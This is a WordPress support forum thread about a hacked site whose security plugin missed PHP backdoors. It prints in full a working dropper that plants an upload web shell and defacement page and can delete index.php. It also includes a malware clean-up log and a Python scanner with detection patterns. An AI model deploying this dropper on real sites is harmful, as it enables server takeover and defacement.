Defender might have overlooked files which do look suspicious

Hi folks,

I've decided to try out Defender, prompted at least partly because I think one of my sites has been hacked. I've attached two files which I found in /wp-content.

There are lots more files like this in /wp-content/uploads and /wp-content/uploads/sites.

I've installed Defender, run a scan, and Defender has told me:
"0 issues found. Congratulations! Everything is just fine."

It's just not looking fine from my perspective.

Happily, this site is currently running from WP Engine, so I've asked those folks to look into this and clean up if they need to.

Just wondered if you had any response to this?

  • Mina

    Oops, I wasn't allowed to upload the files (reasonable, as they were PHP). So here's what one of them contains:

    _input_zz.php5

    <?php error_reporting(0);if(isset($_GET["fjxtq"])){echo"[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";}}$file = ' <?php if(isset($_GET["fjxtq"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?><?php echo "<!--  -->";echo "<br>";?><title>Hacked by d3b~X</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}<!-- <?php echo md5(deb) ?> -->';
    $path = $_SERVER["DOCUMENT_ROOT"];
    $r=fopen($path."/ganteng.php", "w");fwrite($r,$file);fclose($r);
    $r=fopen($path."/wp-content/ganteng.php", "w");fwrite($r,$file);fclose($r);
    $r=fopen($path."/wp-admin/ganteng.php", "w");fwrite($r,$file);fclose($r);
    if(isset($_GET["patch"])){
     $r=fopen("./../.htaccess", "w");fwrite($r,"php_flag engine off");fclose($r);
     unlink("../index.php");
     unlink(__FILE__);
     echo "Patched";
    }
    echo md5(deb); ?>
  • Predrag Dubajic

    Hey Mina,

    Hope you're doing well today :)

    Thanks a lot for providing us with the example file, I have added this to my test installation and Defender indeed didn't return any results for that file.

    I must say that I'm not sure why it missed it, but I have forwarded your thread to the Defender developer so he can have a closer look at this and give us some more info.

    Best regards,
    Predrag

  • Mina

    Wanted to post some follow-up. At the moment, this site is running on WP Engine, and I raised the issue with them too, as they offer security scans and clean-ups.

    I've just heard back from them that their systems cleared out the following files:

    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_UKK.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_AM0.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_31Q.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_HJ1.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_GFJ.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/_input_1_.php5 Details: php.backdoor.filesman.029.002
    CLEARED: Cleared suspicious malware from file: ./wp-content/uploads/sites/6/gravity_forms/_input_1_.php5 Details: php.backdoor.system.001
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/gravity_forms/_input_1_.phtml Details: php.backdoor.filesman.029.002
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/gravity_forms/_input_1_.php3 Details: php.backdoor.filesman.029.002
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/gravity_forms/_input_1_.pht Details: php.backdoor.filesman.029.002
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/2015/11/_input_3_rmt.php5 Details: php.malware.generic.019
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/2015/10/_input_3_upl.php5 Details: php.backdoor.filesman.038
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input__zz.php5 Details: php.backdoor.gagal.001
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_SYQ.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_TCA.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_UOZ.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_2IW.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_BTB.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_99M.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_1V4.php5 Details: php.backdoor.eval_REQUEST.008

    The following files were also removed from the uploads directory after a secondary scan:

    _input_1_BTB.phtml
    _input_1_UOZ.phtml
    _input_1_EDN.phtml.
    _input_1_UY2.php.
    _input_1_GFJ.php5
    _input_1_XNB.phtml.
    _input_1_HJ1.php5
    _input_1_YHU.php5.
    _input_1_1V4.php5
    _input_1_N5S.php.
    _input_1_YQ1.php.
    _input_1_2IW.php5
    _input_1_O4H.php5.
    _input_1_Z7Q.phtml.
    _input_1_31Q.phtml
    _input_1_QX0.phtml.
    _input__zz.gif
    _input_1_99M.phtml
    _input_1_SYQ.phtml
    _input__zz.php.
    _input_1_AM0.php5
    _input_1_TCA.phtml
    _input__zz.php5
    _input_1_AOI.php5.
    _input_1_U9F.php5.
    _input_1_B6Z.php.
    _input_1_UKK.php5
    _input__filebox.php.jpg
    _input_1_.php.
    _input_1_.php5
    _input_3_.gif
    _input_3_.txt

    Hope this helps. It's a bit disquieting that Defender missed these.
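For anyone reading this later: the files WP Engine removed share two traits that a scanner can pick up without any signature database, namely an extension a PHP handler may execute (.php5, .phtml, .php3, .pht, and the double extension .php.jpg) sitting in a directory that should only ever hold media, and a body that probes the environment (php_uname, disable_functions) and deletes itself. The script below is an added example, not Defender's, WP Engine's or anyone in this thread's code. The extension list beyond the ones seen here, the indicator regexes (derived from the file Mina posted) and the sample uploads tree it builds in a temp directory are all assumptions or constructed fixtures; the .php5 fixture only carries the dropper's fingerprints, it is not the dropper.

```python
"""Scan a WordPress uploads tree for files that should never be there:
anything a PHP handler might execute, plus content resembling the dropper
quoted in this thread. Added example; not Defender's or WP Engine's code."""
import re
import tempfile
from pathlib import Path

# Extensions PHP handlers are commonly configured to execute. php, php3,
# php5, pht and phtml appear in the clean-up report above; the rest are
# assumptions about typical AddHandler / FilesMatch configurations.
EXECUTABLE_PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar"}

# Content indicators drawn from the posted dropper: (label, regex) pairs
# evaluated against raw bytes, in this order.
INDICATORS = [
    ("php_open_tag", re.compile(rb"<\?php", re.I)),
    ("env_probe_php_uname", re.compile(rb"php_uname\s*\(", re.I)),
    ("env_probe_disable_functions", re.compile(rb"disable_functions", re.I)),
    ("self_delete", re.compile(rb"unlink\s*\(\s*__FILE__\s*\)", re.I)),
    ("writes_php_file", re.compile(rb"fopen\s*\(.{0,80}\.php['\"]\s*,\s*['\"]w['\"]", re.I | re.S)),
    ("upload_form", re.compile(rb"enctype=multipart/form-data", re.I)),
]
MAX_READ = 512 * 1024  # only the head of each file is inspected


def executable_extensions(name):
    """Return every dotted extension of `name` that a PHP handler may execute.

    Every suffix is checked, not just the last one, so a double extension
    such as `_input__filebox.php.jpg` is caught; a trailing dot (as in the
    clean-up list quoted above) is ignored.
    """
    parts = name.lower().rstrip(".").split(".")
    return [p for p in parts[1:] if p in EXECUTABLE_PHP_EXTENSIONS]


def content_indicators(path):
    """Return the labels of all indicator patterns matched in the file head."""
    data = path.read_bytes()[:MAX_READ]
    return [label for label, rx in INDICATORS if rx.search(data)]


def scan_uploads(root):
    """Walk `root` and return {relative_path: [reasons]} for every hit.

    A file is reported if its name carries an executable extension or its
    content matches any indicator; the reasons say which.
    """
    root = Path(root)
    findings = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        reasons = [f"ext:{e}" for e in executable_extensions(path.name)]
        reasons += content_indicators(path)
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def build_sample_uploads(base):
    """Create a constructed uploads tree (fixtures, not files from the thread)."""
    base = Path(base)
    files = {
        "2015/10/photo.jpg": b"\xff\xd8\xff\xe0JFIF constructed benign image bytes",
        "2015/10/notes.txt": b"plain text, nothing to see",
        # Name mirrors the report; body is a harmless fixture carrying the
        # dropper's fingerprints, not the dropper itself.
        "sites/6/_input_1_.php5": (
            b"<?php /* fixture */ echo php_uname(); "
            b"ini_get('disable_functions'); unlink(__FILE__);"
        ),
        # Double extension: a handler keyed on ".php" anywhere in the name
        # can still execute this, so the image magic up front is no defence.
        "sites/_input__filebox.php.jpg": b"\xff\xd8\xff\xe0<?php /* fixture */",
        # Alternate extension plus the upload form the dropper writes out.
        "sites/_input_1_31Q.phtml": b"<form enctype=multipart/form-data>",
    }
    for rel, body in files.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)
    return base


def demo():
    """Build the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_uploads(tmp)
        return scan_uploads(tmp)


if __name__ == "__main__":
    for rel, reasons in demo().items():
        print(f"{rel}: {', '.join(reasons)}")
```

Point it at a real wp-content/uploads with `scan_uploads("/path/to/wp-content/uploads")`. The extension check alone would have flagged every file in the clean-up list above, because nothing legitimately uploaded through WordPress ends in .php5 or .phtml; the content indicators are there for files hidden under a harmless-looking extension, which only matters if the server can be made to run them, which is exactly why uploads should also sit behind an `php_flag engine off` (or equivalent) rule.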